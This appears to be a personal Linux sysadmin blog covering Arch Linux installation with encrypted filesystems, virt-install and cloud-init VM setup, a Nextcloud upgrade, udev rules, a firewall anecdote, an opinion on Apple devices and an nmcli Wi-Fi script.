Arch Linux installation notes: three filesystem schemes

I started my Linux journey with Arch Linux about five years ago (technically, I used Ubuntu 9.10 way back when, but that's a story for another day). As a newbie, installing Arch by hand was a pretty big deal for me. It taught me almost everything I know about Linux and open source software in general.

Over time, I moved on from Arch to Debian/Ubuntu/Fedora, but I have always kept a technical note on how to install Arch Linux. What drove me to revisit this topic? Well, I decided to put Linux on an old MacBook Pro with an Intel CPU. I can think of no better distro than Arch Linux: it is flexible, lightweight, and... did I mention it's Arch, btw?

This article focuses on installing the Arch Linux base system on a laptop or desktop with a single hard drive and UEFI support. It uses one of three partition/filesystem schemes and one of two boot loaders (GRUB or systemd-boot). The scenarios are:

  1. LVM with ext4: no encryption
  2. LVM on LUKS: offers root partition encryption
  3. Btrfs on LUKS: like the above, but with Btrfs instead of LVM/ext4
  4. Encrypted EFI system partition with Unified Kernel Image

The purpose is to dual boot Arch Linux with macOS, so an encrypted EFI partition is out of the question here. I might write another article about Unified Kernel Images in the future.

While researching and refining my notes, I came across the YouTube channel EF linux. His videos are concise and straight to the point. I also recommend his video about Btrfs snapshots with Timeshift.

So, without further ado, let me present my raw notes of installing Arch Linux in (late) 2023.


Live system stage

Preparation

wireless network config
Wi-Fi: iwctl (authenticates to Wi-Fi) or wifi-menu (netctl)
Ethernet: ArchISO's systemd-networkd and systemd-resolved should work out of the box
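For iwctl, a typical session looks like this (the device name wlan0 and the SSID MY-SSID are placeholders for your hardware and network):

```shell
# list wireless devices, scan, and show available networks
iwctl device list
iwctl station wlan0 scan
iwctl station wlan0 get-networks
# connect; iwctl prompts for the passphrase interactively
iwctl station wlan0 connect MY-SSID
```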

SSH remote install:
passwd to set root password
systemctl start sshd.service
ip addr to get IP address

Optional:
setfont ter-132b set larger font for HiDPI
timedatectl set-ntp true to ensure the system clock is accurate
ls /sys/firmware/efi/efivars verify boot mode (the directory only exists when booted in UEFI mode)
cat /sys/firmware/efi/fw_platform_size another way to verify (64 or 32)

Partitioning

https://wiki.archlinux.org/title/Partitioning
https://wiki.archlinux.org/title/EFI_system_partition
https://wiki.archlinux.org/title/Btrfs
https://wiki.archlinux.org/title/Install_Arch_Linux_on_LVM
https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system

Boot partition

Partition the disk: create ESP (EFI system partition) and "Linux root" partition
cfdisk is a TUI alternative to fdisk
fdisk -l check existing disks/partitions
fdisk /dev/sd[X]

Format and mount:
mkfs.fat -F 32 /dev/sda1 format ESP to FAT32
mkdir -p /mnt/boot
mount /dev/sda1 /mnt/boot

Notes on ESP mount point:

  • /boot: cannot be encrypted; contains kernels, initramfs images, microcode, boot loader config files; supports dual boot with Windows/macOS
  • /efi (historically /boot/efi): only boot loader config files
  • /boot or /efi: /dev/sda1, EFI system partition (GUID C12A7328-F81F-11D2-BA4B-00A0C93EC93B), 300 MB to 1 GB
  • /: /dev/sda2, Linux root (GUID 4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709), remainder of the disk
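As a scriptable alternative to fdisk/cfdisk, sgdisk (from the gptfdisk package) can create both partitions non-interactively. A sketch, assuming the target disk is /dev/sdX (destructive -- double-check the device name first):

```shell
sgdisk --zap-all /dev/sdX                                  # wipe any existing partition table
sgdisk -n 1:0:+512M -t 1:ef00 -c 1:"EFI system" /dev/sdX   # ef00 = EFI system partition
sgdisk -n 2:0:0     -t 2:8304 -c 2:"Linux root" /dev/sdX   # 8304 = Linux x86-64 root
```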

1. LVM

LVM with ext4 (no LUKS encryption), see Install Arch on LVM

  • create pv, vg and lv on /dev/sda2 (if the lv will be formatted with ext4, leave 256 MiB of free space for e2scrub; see the next section for how)
  • format: mkfs.ext4 /dev/VolGroup/root
  • mount: mount /dev/VolGroup/root /mnt
  • note: swap and home logical volumes are optional
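The bullet points above expand to roughly these commands (VolGroup is just an example volume group name):

```shell
pvcreate /dev/sda2                    # physical volume
vgcreate VolGroup /dev/sda2           # volume group
lvcreate -l 100%FREE -n root VolGroup # logical volume (lowercase -l for extents/percentage)
lvreduce -L -256M VolGroup/root       # if ext4, leave 256 MiB for e2scrub
mkfs.ext4 /dev/VolGroup/root
mount /dev/VolGroup/root /mnt
```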

2. LVM on LUKS

LVM on LUKS

  • LUKS2
    cryptsetup luksFormat /dev/sda2
    cryptsetup open /dev/sda2 cryptroot
  • LVM
    pvcreate /dev/mapper/cryptroot
    pvdisplay/pvscan
    vgcreate VolGroup /dev/mapper/cryptroot
    lvcreate -l 100%FREE VolGroup -n root ### lowercase -l for percentages of extents
    lvreduce -L -256M VolGroup/root ### if ext4, leave 256 MiB space for e2scrub
  • format and mount
    mkfs.ext4 /dev/VolGroup/root
    mount /dev/VolGroup/root /mnt

3. Btrfs on LUKS

Btrfs

  • LUKS2
    cryptsetup luksFormat /dev/sda2
    cryptsetup open /dev/sda2 cryptroot
  • Btrfs
    mkfs.btrfs -L archlinux /dev/mapper/cryptroot
    mount /dev/mapper/cryptroot /mnt
    cd /mnt
    btrfs subvolume create @       ## or root
    btrfs subvolume create @home   ## or home
    cd
    umount /mnt
    mount -o subvol=@,compress=zstd /dev/mapper/cryptroot /mnt
    mkdir /mnt/home                ## create the mount point after @ is mounted
    mount -o subvol=@home,compress=zstd /dev/mapper/cryptroot /mnt/home

Install base system

(optionally) edit mirrors /etc/pacman.d/mirrorlist
pacstrap -K /mnt base linux linux-firmware sudo lvm2 btrfs-progs nano, plus intel-ucode or amd-ucode depending on the CPU, and optionally networkmanager

  • Kernels can be linux-lts or linux-zen
  • skip linux-firmware if it's a VM

FSTAB

genfstab -U /mnt >> /mnt/etc/fstab use -U or -L to define by UUID or labels, respectively
cat /mnt/etc/fstab to verify

Chroot stage

arch-chroot /mnt

Initramfs (mkinitcpio)

Workflow:
edit hooks in /etc/mkinitcpio.conf
re-generate mkinitcpio -P

See also:
mkinitcpio common hooks
kernel parameters

1. LVM

lvm2 package must be installed in the arch-chroot environment
"udev" and "lvm2" for busybox-based initramfs: HOOKS=(base udev ... block lvm2 filesystems)
"systemd" and "lvm2" for systemd-based initramfs: HOOKS=(base systemd ... block lvm2 filesystems)

2. LVM on LUKS

lvm2 package must be installed in the arch-chroot environment
"keyboard", "encrypt" and "lvm" for busybox-based initramfs: HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block encrypt lvm2 filesystems fsck)
"keyboard", "sd-encrypt" and "lvm" for systemd-based initramfs: HOOKS=(base systemd autodetect modconf kms keyboard sd-vconsole block sd-encrypt lvm2 filesystems fsck)

3. Btrfs on LUKS

btrfs-progs package must be installed in the arch-chroot environment
"keyboard" and "encrypt" for busybox-based initramfs
"keyboard" and "sd-encrypt" for systemd-based initramfs

For a single-device btrfs pool, the "filesystems" hook is sufficient (no need for the "btrfs" hook)
For a multi-device btrfs pool, use one of the "udev", "systemd" or "btrfs" hooks. See common hooks
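Putting this together, the resulting HOOKS lines for Btrfs on LUKS would look roughly like the LVM-on-LUKS ones above, minus lvm2:

```
# busybox-based initramfs
HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block encrypt filesystems fsck)
# systemd-based initramfs
HOOKS=(base systemd autodetect modconf kms keyboard sd-vconsole block sd-encrypt filesystems fsck)
```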

Additionally, edit /etc/fstab to add mount options: (get UUID by lsblk -f or blkid)

UUID=XXX / btrfs subvol=@,compress=zstd:9,discard=async,noatime,ssd
UUID=YYY /home btrfs subvol=@home,compress=zstd:9,discard=async,noatime,ssd

Boot loader

Installation:

  • systemd-boot is shipped with the systemd package which is a dependency of the base meta package
  • GRUB pacman -S grub efibootmgr
  • rEFInd: pacman -S refind efibootmgr (the package was renamed from refind-efi)

Boot loader setup and kernel parameters for each scheme:

1. LVM

Choose any boot loader
Kernel parameter root=/dev/VolGroup/root

2. LVM on LUKS

GRUB install (assuming the ESP is mounted at /boot)
grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB
grub-mkconfig -o /boot/grub/grub.cfg

(Optional) fallback boot path:
either use --removable flag
or mkdir *esp*/EFI/BOOT and cp *esp*/EFI/GRUB/grubx64.efi *esp*/EFI/BOOT/BOOTX64.EFI

Kernel parameters: https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system#Configuring_the_boot_loader_2
Get UUID by lsblk -f or blkid
Unlock the encrypted root partition at boot (<device-UUID> refers to the LUKS partition /dev/sda2):
For encrypt hook: cryptdevice=UUID=<device-UUID>:cryptroot:allow-discards root=/dev/VolGroup/root
For sd-encrypt hook: rd.luks.name=<device-UUID>=cryptroot rd.luks.options=discard root=/dev/VolGroup/root

3. Btrfs on LUKS

Install systemd-boot: bootctl install (optionally set --esp-path=/custom/esp)
Automatic update: enable systemd-boot-update.service and/or add pacman hook
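A pacman hook for this could look like the following (the file name and description are conventional, not mandated):

```ini
# /etc/pacman.d/hooks/95-systemd-boot.hook
[Trigger]
Type = Package
Operation = Upgrade
Target = systemd

[Action]
Description = Updating systemd-boot...
When = PostTransaction
Exec = /usr/bin/bootctl update
```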

Configure nano /boot/loader/loader.conf

# default name must match filename /boot/loader/entries/arch.conf
default arch
timeout 3
console-mode max
# console-mode auto/keep
# editor no

Add a loader entry: nano /boot/loader/entries/arch.conf (add -lts for the LTS kernel)

title Arch Linux
linux   /vmlinuz-linux
initrd  /intel-ucode.img
# initrd  /amd-ucode.img
initrd  /initramfs-linux.img
# kernel parameters for btrfs on LUKS ("encrypt" hook); XXX is the UUID of the LUKS partition (/dev/sda2)
options cryptdevice=UUID=XXX:cryptroot:allow-discards root=/dev/mapper/cryptroot rootflags=subvol=@ rw quiet splash
# kernel parameters for btrfs on LUKS ("sd-encrypt" hook); XXX as above, YYY is the UUID of the filesystem on /dev/mapper/cryptroot
options rd.luks.name=XXX=cryptroot rd.luks.options=discard root=UUID=YYY rootflags=subvol=@ rw quiet splash

Note:

  • Fedora GRUB only has "rd.luks.name=", no "root=" nor "rootflags="; but Arch has to have these
  • Either set "rootflags=" here or btrfs subvolume set-default <subvolume-id> /

Fallback nano /boot/loader/entries/arch-fallback.conf; add -lts for LTS kernel

title Arch Linux (fallback initramfs)
...
initrd  /initramfs-linux-fallback.img
...

Time zone

From here on it's easy; just follow the Installation Guide

ln -sf /usr/share/zoneinfo/America/Toronto /etc/localtime to set the time zone
hwclock -w -u (i.e. --systohc --utc) to set the hardware clock from the system time

Localization

nano /etc/locale.gen uncomment en_CA.UTF-8 and other needed locales
or
echo "en_CA.UTF-8 UTF-8" >> /etc/locale.gen
lastly
locale-gen to generate locale

nano /etc/locale.conf to set the LANG variable: LANG=en_CA.UTF-8
or
optionally locale > /etc/locale.conf

Network configuration

echo MYHOSTNAME > /etc/hostname

nano /etc/hosts

127.0.0.1   localhost
::1     localhost
127.0.1.1   MYHOSTNAME.localdomain  MYHOSTNAME

either systemctl enable systemd-networkd.service systemd-resolved.service and follow some example configurations
or pacman -S networkmanager + systemctl enable NetworkManager
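If you go the systemd-networkd route, a minimal DHCP configuration for a wired interface might look like this (the file name and interface glob are examples):

```ini
# /etc/systemd/network/20-wired.network
[Match]
Name=en*

[Network]
DHCP=yes
```

For name resolution with systemd-resolved, you may also want to symlink /etc/resolv.conf to /run/systemd/resolve/stub-resolv.conf.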

User and password

passwd to set the root password (or skip it to keep root locked and rely on sudo)
ensure sudo package is installed
useradd -m -G wheel -s /bin/bash your_user
passwd your_user
EDITOR=nano visudo and uncomment %wheel ALL=(ALL:ALL) ALL

Reboot

exit to exit chroot
umount -R /mnt optional but safe
reboot

Post-install

Useful topics

systemd-boot: enable systemd-boot-update.service and/or add pacman hook

zram: replaces swap file or swap partition
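With the zram-generator package, a sketch of its configuration file (sizes here are illustrative):

```ini
# /etc/systemd/zram-generator.conf
[zram0]
zram-size = min(ram / 2, 4096)
compression-algorithm = zstd
```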

Hibernation: (swap partition)
For "encrypt" hook: resume=/dev/VolGroup/swap (same format as root parameter)
systemd-boot ("sd-encrypt" hook): does not require additional kernel parameter with systemd >= v255

Snapper is a command-line tool (no official GUI) with GRUB and rEFInd integration
Timeshift has a GUI as well as a command line tool

Simplify Linux VM installation on KVM/QEMU with virt-install and cloud-init

This is a follow-up to my previous post about Windows VM installation. This one, surprise surprise, is about installing Linux VMs.

I hate tedious manual work, but sometimes it also doesn't make sense to spend time modifying an Ansible playbook that I will probably only use a few times. I find that virt-install and cloud-init meet most of my needs when it comes to quickly spinning up VMs for testing. They offer simplicity with great flexibility. Within minutes I can create VMs for testing; if I want to go crazy, I can even have cloud-init run Ansible during the first boot. Other automation tools would probably work as well.

For more serious stuff (like a production server), I will stick to Ansible for deployment and config management.


I will use Ubuntu as the example for this tutorial. Debian/Fedora/CentOS Stream all have cloud editions. Download the cloud image (.img) file.

In a directory, create files meta-data and user-data (optionally vendor-data)

meta-data:

instance-id: <Your-ID> # not important; will not be in virtual machine's XML file
local-hostname: ubuntu.local.lan # this will be the FQDN

user-data docs and examples

#cloud-config
users:
  - name: user1
    gecos: A super admin user on Ubuntu with passwordless sudo
    groups: [sudo, adm, audio, cdrom, dialout, floppy, video, plugdev, dip, netdev]
    # other than sudo, the rest are Ubuntu defaults
    shell: /bin/bash
    sudo: 'ALL=(ALL) NOPASSWD:ALL'
    lock_passwd: true # by default; disables password login
    # note: chpasswd is a top-level directive, not a per-user key
    ssh_authorized_keys:
      - <Your SSH pub key>

    # Another example
  - name: user2
    gecos: A generic admin user with sudo privilege but requires password
    groups: users,admin,wheel
    shell: /bin/bash
    sudo: 'ALL=(ALL) ALL'
    passwd: <hash of password> # mkpasswd --method=SHA-512 --rounds=4096 ## to get the hash
    ssh_authorized_keys:
      - '<Your SSH pub key>'

package_update: true
package_upgrade: true # default command on Ubuntu is 'apt dist-upgrade'

# installing additional packages
packages:
  - ansible

# cloud-init is able to chain Ansible pull mode, if further configuration is needed
ansible:
  pull:
    url: "https://git.../xxx.git"
    playbook_name: xxx.yml

# run some commands on first boot
bootcmd: # very similar to runcmd, but commands run very early in the boot process, only slightly after a 'boothook' would run.
- some commands...
runcmd:
- systemctl daemon-reload

#swap: # by default, there is no swap
#  filename: /swap
#  size: "auto" # or size in bytes
#  maxsize: 2147483648   # size in bytes (2 GiB)

# after system comes up first time; find IP in the output text
final_message: "The system is finally up, after $UPTIME seconds"

Finally, install the VM with cloud-init scripts and the cloud image we downloaded earlier. We are going to use user session qemu:///session and store the qcow2 image to ~/.local/share/libvirt/images/xxx.qcow2

# list accepted OS variants with: virt-install --osinfo list (e.g. debian11, fedora37, win10)
virt-install \
  --connect qemu:///session \
  --name ubuntu \
  --vcpus 2 \
  --memory 2048 \
  --osinfo ubuntu22.04 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics none \
  --disk ~/.local/share/libvirt/images/xxx.qcow2,size=30,backing_store="$PWD/jammy-server-cloudimg-amd64.img",target.bus=virtio \
  --cloud-init user-data="$PWD/user-data",meta-data="$PWD/meta-data"
# optional extras (comments cannot appear mid-command, so add these to the line above):
#   --cpu MODEL[,+feature][,-feature][,match=MATCH][,vendor=VENDOR]
#   --memballoon driver.iommu=on
# --graphics none gives a serial console, suitable for server installs

As usual, tweak any flags as you see fit.

Simplify Windows VM installation on KVM/QEMU with virt-install

This post is for you if you:

  • Need to quickly spin up a Windows virtual machine on a Linux server or workstation
  • Want to have performance optimized hardware settings for Windows VM
  • Don't want to click through a graphical interface such as virt-manager or Gnome Boxes every time

Well, I have the solution for you. From time to time I need a Windows VM for various purposes. Manually installing Windows on Linux KVM/QEMU is error-prone and time-consuming. To scratch my own itch, I have found and documented a way to reliably spin up Windows 10 and 11 VMs on any Linux machine.

Prerequisite

You will need to prepare the following things before you can start:

  • Windows 10 or 11 ISO image (nowadays you can download directly from Microsoft)
  • Virtualisation stack (sudo apt install qemu-kvm libvirt-daemon-system or sudo dnf install @virtualization)
  • virt-install command-line utility (provided by package virtinst on Debian/Ubuntu; virt-install on RHEL/Fedora)

virt-install command

The one-liner command for Windows 10 or 11. Adjust anything you see fit.

virt-install \
  --connect qemu:///session \
  --name win11-test \
  --boot uefi \
  --vcpus 4 \
  --cpu qemu64,-vmx \
  --memory 8192 \
  --memballoon driver.iommu=on \
  --osinfo win11 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics spice \
  --noautoconsole \
  --cdrom Win11_22H2_English_x64v2.iso \
  --disk /home/ewon/.local/share/libvirt/images/win11-test.qcow2,size=50,target.bus=scsi,cache=writeback \
  --controller type=scsi,model=virtio-scsi,driver.iommu=on

Explanations:

  • To use the KVM/QEMU system session (as opposed to the user session), specify --connect qemu:///system
  • The --boot uefi may not work reliably on some distros. For example, Fedora 37 (as I tested; Fedora 38 seems to be fine) would default to non-4M version of the OVMF file, resulting in non-working UEFI, hence no Windows 11 support. You may need to manually specify OVMF 4M file path using the following flags instead:
--machine q35 \
--boot loader=/usr/share/edk2/ovmf-4m/OVMF_CODE.fd,loader.readonly=yes,loader.type=pflash,nvram.template=/usr/share/edk2/ovmf-4m/OVMF_VARS.fd,loader_secure=yes \
# For Fedora, the OVMF 4M code is under /usr/share/edk2/ovmf-4m/OVMF_CODE.fd
# For Debian, the OVMF 4M code is under /usr/share/OVMF/OVMF_CODE_4M.fd
  • The --cpu flag for AMD is qemu64,-vmx; qemu64 enables Windows 11 support
  • The --osinfo flag can be either win10 or win11
  • Memory, network and disk controller all support IOMMU driver. Enable them for best performance
  • --graphics spice implies both --video=qxl and --channel=spicevmc; use it for best performance
  • --disk specifies the path of the qcow2 image file; use scsi (VirtIO) and writeback cache for best performance
  • --controller is a rather important flag that often gets overlooked. It has to be specified for the scsi-type disk (see --disk) to show up in Windows

Installation process

Follow the steps:

  • Paste the virt-install one-liner and hit enter. Ideally you would get the following output:
[ewon@ThinkPad]$ virt-install \
  --connect qemu:///session \
  --name win11-test \
  --boot uefi \
  --vcpus 4 \
  --cpu qemu64,-vmx \
  --memory 8192 \
  --memballoon driver.iommu=on \
  --osinfo win11 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics spice \
  --noautoconsole \
  --cdrom Win11_22H2_English_x64v2.iso \
  --disk /home/ewon/.local/share/libvirt/images/win11-test.qcow2,size=50,target.bus=scsi,cache=writeback \
  --controller type=scsi,model=virtio-scsi,driver.iommu=on

Starting install...
Allocating 'win11-test.qcow2'                                                                     |    0 B  00:00:00 ...
Creating domain...                                                                               |    0 B  00:00:00

Domain is still running. Installation may be in progress.
You can reconnect to the console to complete the installation process.
  • We also need the VirtIO drivers ISO attached to the VM during installation. Since virt-install does not support loading multiple CD-ROMs, we have to add it using virt-manager (see the step below) or by directly editing the XML file (see how-to).
  • Shut down the VM, then edit it to include the second CD-ROM. Don't forget to keep SATA CDROM 1 (the Windows ISO) enabled as a boot device.
  • Start the VM and attach to graphical console. Windows Installer should appear.
  • If you manually specified --machine q35 and --boot loader= instead of --boot uefi, press Esc during boot, turn on Secure boot. While you are in UEFI settings, you can also adjust the screen resolution.
  • Follow Windows Installer, load drivers (vioscsi, NetKVM, Balloon) from virtio-win CD Drive and continue the installation process.
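If you prefer the command line over virt-manager, attaching the VirtIO drivers ISO as a second CD-ROM can be sketched with virsh (VM name taken from the example above; the ISO path is a placeholder):

```shell
virsh --connect qemu:///session shutdown win11-test
virsh --connect qemu:///session attach-disk win11-test \
    /path/to/virtio-win.iso sdb --type cdrom --mode readonly --config
virsh --connect qemu:///session start win11-test
```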

Post-installation and bugs

After Windows is installed, you will want to install the VirtIO Guest Tools by running "virtio-win-gt-x64.msi" from the CD-ROM. It enables quality-of-life improvements such as dynamic resolution and two-way clipboard sharing. After that, you can remove the two CD-ROMs from the VM instance.

If the screen resolution still looks off, make sure the GPU is detected by Windows: in Windows Update, check "receive updates for other Microsoft products...", then install the graphics driver.

A downside of enabling UEFI firmware is that internal snapshots are not possible; see StackExchange for workarounds. Personally I don't bother snapshotting Windows VMs anyway, since they are ephemeral. If I were to solve it, I would use filesystem snapshots (Btrfs or ZFS).

I've probably encountered other bugs/annoyances in the past that I didn't document. Since installing a Windows VM is a somewhat "popular" practice among Linux users, I think most problems have been found and fixed, or at least worked around. Fire up your search engine if you can't solve something on your own.

Nextcloud upgrade woes

I have been self-hosting a Nextcloud instance for almost two years. It is a LAMP stack in a Proxmox LXC container. The container's operating system is Debian 11, with PHP 7.4.

Up until Nextcloud 25, everything was good. I always used the web updater for minor and major Nextcloud upgrades. It wasn't always smooth sailing (sometimes I needed to drop into the command line to do some post-upgrade work), but generally speaking things worked as intended.

A few months ago, I heard that Nextcloud 26 would drop support for PHP 7.4, which meant Debian 11 would not be able to upgrade to Nextcloud 26. That was fine, because Debian 12 was just around the corner; I could rock 25 until Debian 12 came out in the summer.

Fast forward to yesterday: I decided to upgrade my LXC container to Debian 12 and Nextcloud from 25 to 27, since both projects had just shipped major releases within the last week. How exciting! Strangely enough, the Nextcloud web interface, under "Administration settings", didn't even report new versions 26 or 27.

I thought "Fine, I will upgrade Debian first and then use Nextcloud web updater". Turns out, Debian upgrade went very smoothly; all php packages were bumped from 7.2 to 8.2; reboot, done. However, Nextcloud cannot be opened, the web interface says something like "This version of Nextcloud is not compatible with PHP>=8.2. You are currently running 8.2.7". I start to grind my teeth as Nextcloud throws me into this hoop. "Fine, I will manually upgrade".

Following the How to upgrade guide, I downloaded latest.zip from the Nextcloud website and started the (painful) process:

  • turn maintenance mode on
  • unzip the file
  • copy everything except config and data into the document root located at /var/www/nextcloud
  • make sure user, group and permissions are correct
  • add "apc.enable_cli = 1" to the PHP CLI config because of this bug
  • sudo -u www-data php occ upgrade

Of course it didn't work. I went to the web interface to see why; it said "Updates between multiple major versions are unsupported". You could hear me grinding my teeth from across the street.

Finally, after a lot of faffing about, I downloaded Nextcloud 26.0.2 and successfully upgraded. However, that wasn't the end of the misery. As per usual, a major upgrade always needs some cleaning up. I got half a dozen warnings under "Administration settings": PHP memory_limit, file hash mismatches, a failed cron job, etc. They are not difficult to fix, just hella annoying.

Just thinking about the 26-to-27 upgrade putting me through (some of) the rigmarole again makes me tired already. This process is stressful and tedious, especially for something you only need to do every half a year. It periodically reminds me of the bad old days of system administration. Maybe I should have opted for the Docker container deployment, I don't know.

On the flip side, thank goodness I have ZFS snapshots of the container and the data directory. Should something go wrong, I can always roll back.
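For reference, the snapshot/rollback dance is short; a sketch assuming a hypothetical dataset name rpool/nextcloud:

```shell
zfs snapshot rpool/nextcloud@pre-upgrade   # take a snapshot before upgrading
zfs list -t snapshot rpool/nextcloud       # verify it exists
zfs rollback rpool/nextcloud@pre-upgrade   # roll back if the upgrade goes sideways
```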

Practical udev rules

udev is a userspace subsystem on Linux that gives system administrators the ability to register userspace handlers for events. In other words, it allows custom actions to be executed when a device is plugged in or removed. The device can be physical or virtual, as long as its device node lives under the /dev directory.

udev rules can do pretty powerful things, and I'm only scratching the surface here. It's also amazing how little has changed in terms of syntax and capabilities, since 2004, when udev was first introduced. My learning resources include:

The motivation for me to learn udev systematically came from work requirements. The custom Linux image we are building has to have specific devices show up under certain /dev/tty paths. This has to work across multiple physical hardware models, be forward compatible with future devices, and, most importantly, work reliably. For example, the pinpad shows up as /dev/ttyS6 and the weight scale as /dev/ttyS7, no matter which port it plugs into or which distro the machine runs (CentOS or Ubuntu).

Monitoring events

When a device is plugged in or removed, we can monitor the verbose messages by running the monitor subcommand. From it we get important info such as the device node (e.g., /dev/ttyUSB0) and environment variables such as "ACTION=add". If it's a USB device, we can also easily use lsusb to find the vendor ID and product ID.

# udevadm monitor --environment --udev

The next step is to use device node path to find all information about this device and its parents.

# udevadm info --attribute-walk --path=$(udevadm info --query=path --name=/dev/ttyUSB0)

Note the message printed out by the above command: "Udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices. It prints for every device found, all possible attributes in the udev rules key format. A rule to match, can be composed by the attributes of the device and the attributes from one single parent device."

It means exactly what it says.

Writing udev rules

Rule files go under /etc/udev/rules.d and, fortunately, the path and syntax are distro-agnostic. Some common match keys are "KERNEL/SUBSYSTEM/ATTR". The corresponding match keys for a parent device are "KERNELS/SUBSYSTEMS/ATTRS" -- think of them as the plural forms of the former. For a complete list of match keys, refer to the man page. A rule to create a symlink for a tty device looks like this:

SUBSYSTEM=="tty", KERNELS=="1-7.3", ATTRS{idVendor}=="067b", ATTRS{idProduct}=="23c3", SYMLINK+="ttyS2"

Here, only the first match key, SUBSYSTEM, is matched against the device itself. The three other match keys are matched against a parent device. Note that all parent match keys have to come from the same parent, i.e., you cannot pick and choose match keys from different parent-level devices.

Some common mistakes I found in other people's rule files:

  • it's not possible to change the device name assigned by the kernel (e.g., NAME="myUSB"). The limitation is due to udev being only a userspace program.
  • most of the time, it's not necessary to specify ACTION=="add" environment variable match key.
  • for symlinks, it's usually not necessary to specify GROUP and MODE as soft links don't inherit ownership and permissions from the original file. Do it only when you know what you are doing.

Some advanced topics include:

  • string substitutions: udev uses printf-like string substitution operators
  • string matching: much like regular expression, accepts "*", "?" and "[]"
  • for removing events, try to leverage environment variable as match keys (ENV{KEY}=="VALUE"), as device attributes may not be accessible.
  • run external scripts/programs with RUN+="/path/to/executable"; think of it like a subshell, in which environment variables will differ from the ones in user shell, and no stdout/stderr.
  • for systemd integration, refer to Scripting with udev
  • OPTIONS+="last_rule" (I can't think of a possible use case)
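Combining two of the points above (environment-variable matching for remove events and RUN), a hypothetical rule might look like this (the vendor ID and script path are made up for illustration):

```
# /etc/udev/rules.d/99-unplug-handler.rules
# on "remove", device attributes are often gone, so match ENV keys instead
ACTION=="remove", SUBSYSTEM=="tty", ENV{ID_VENDOR_ID}=="067b", RUN+="/usr/local/bin/handle-unplug.sh"
```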

Triggering new rules

After saving the rules files, manually trigger them against existing devices:

# udevadm trigger
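If a rule doesn't seem to apply, reload the rule files explicitly and dry-run a device against them (reusing the /dev/ttyUSB0 example from earlier):

```shell
udevadm control --reload                                          # re-read rule files without rebooting
udevadm test "$(udevadm info --query=path --name=/dev/ttyUSB0)"   # show which rules would match
```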

You will find out instantly whether your rules work or not. Novices like myself may rely on trial and error to develop their first couple of rules, and I shamelessly confess that's how I learned udev. Once I got the basics, it felt like a second language.

Put your computer behind a firewall

A recent task at work required me to investigate a failure on a Linux machine deployed at a customer's site.

I remoted into said machine and quickly found the problem. The log file for the GDM display manager (~/.cache/gdm/access.log) had grown to almost 100 GiB, driving the free space to zero. As a result, the system crashed and the log files got cleared. The cycle repeated.

Upon checking access.log, I found continuous failed login attempts on port 5900/TCP (the default VNC server port) from malicious bots. I also noticed thousands of failed SSH login attempts on root.

Turns out, this machine was assigned a public IP address and open to the internet. By design, these Linux machines are never meant to be exposed to the open internet, but here we are. I could only patch up the firewall as much as possible at the machine level, knowing it would inevitably fall into the hands of a botnet.

Fingers crossed this particular client won't be owned by ransomware gangs, at least not soon.

Why I think Apple devices are a better choice for normal people

I have been a FOSS user and advocate for a few years now. My main computers run Linux, and I work for a company on Linux-related stuff. However, I have always had Apple devices around; some are my own purchases (iPhones and iPads) and some were passed on to me (Macs). Before you read on: this post is about the reasoning behind recommending Apple devices for non-technical users. It is subjective and heavily biased. You have been warned.

As a long-time (well, since around 2010) mobile user and tech follower, I have to give Apple credit for their end-to-end hardware and software solutions, especially from a "normie's" perspective. The longevity of OS support, good default privacy settings and the general availability of battery service are the main reasons I say this. Full disclaimer: I used to be a Google/Android fan; I've owned several Google-branded Android phones, including the Nexus 4, the original Pixel and the Pixel 3.

Take my own experience as an example: I purchased a refurbished iPhone 8 in 2020 (it originally came out in fall 2017); I've been using it for 2.5 years now and just had the battery replaced. Now I can keep using the phone until the end of 2023, when (presumably) iOS 16 stops being supported. For a device I paid roughly $300 CAD for, that's a hell of a value. A startling contrast is the Google Pixel 3 (fall 2018), which lost support from Google after a mere 3 years. People may argue that you can root it and flash LineageOS. While that is technically feasible and might be fun for some, I wouldn't even consider it an option for normal users.

The next major point is default privacy. I know some people may disagree and even spit on the idea that Apple is good for privacy, but the truth is that Apple's centrally controlled App Store does a lot better than its competitors. In some parts of the world, people are forced to use third-party app markets instead of the Play Store (the stock ROM defaults to a third-party store, certain apps are not available on the Play Store, or the Play Store is simply not accessible). Third-party app markets are a wild west, to put it mildly, and their popularity is high in certain regions. Again, I am not endorsing Apple, just contrasting it with its Android counterparts. You can draw your own conclusions.

Lastly, there's the ease of battery replacement and its modest cost ($49 CAD for an iPhone 8, at the time of writing). Can you name an Android phone battery replacement service that is universally available across North America and costs less than $100 CAD for a 3+ year old device? It's probably rarer than a dinosaur. For an iPhone, I can just walk into an authorized store and have it serviced in less than 40 minutes.

All in all, I would personally recommend only Apple devices to my family members. Non-technical people also deserve reasonably good privacy, a serviceable battery and more than 3 years of security updates out of a device.

Scripting with nmcli to connect RADIUS/WPA2 Enterprise Wi-Fi network

Recently a challenge came up at work: a batch of Linux client machines to be deployed on site need to connect to an enterprise Wi-Fi network with a RADIUS authentication server.

Due to the sheer number of client machines, it is impractical to configure them individually using NetworkManager's GUI, so I decided to write a small script that automates the process using NetworkManager's command-line interface: nmcli.

The script is very straightforward: it reads the desired IP address, turns on the Wi-Fi radio and connects to a pre-configured Wi-Fi network with a static IP and manual DNS/gateway settings.

#!/bin/bash

# Grab the machine's current static IPv4 address (with prefix) from the first
# interface carrying a 192.168.x.x address
currentstaticip=$(ip -4 --brief address | grep -m1 192.168 | awk '{print $3}')
echo "The static IP address of $HOSTNAME is $currentstaticip"

# Turn Wi-Fi on and give it a moment to scan for networks
nmcli radio wifi on
sleep 3

# Configure the wlan0 connection profile (assumed to already exist)
nmcli con modify wlan0 802-11-wireless.ssid THE-SSID

nmcli con modify wlan0 802-1x.eap peap 802-1x.identity THE-IDENTITY \
802-1x.password THE-PASSWD \
802-1x.phase2-auth mschapv2 \
802-11-wireless-security.key-mgmt wpa-eap

nmcli con modify wlan0 ipv4.method manual
nmcli con modify wlan0 ipv4.address "$currentstaticip"
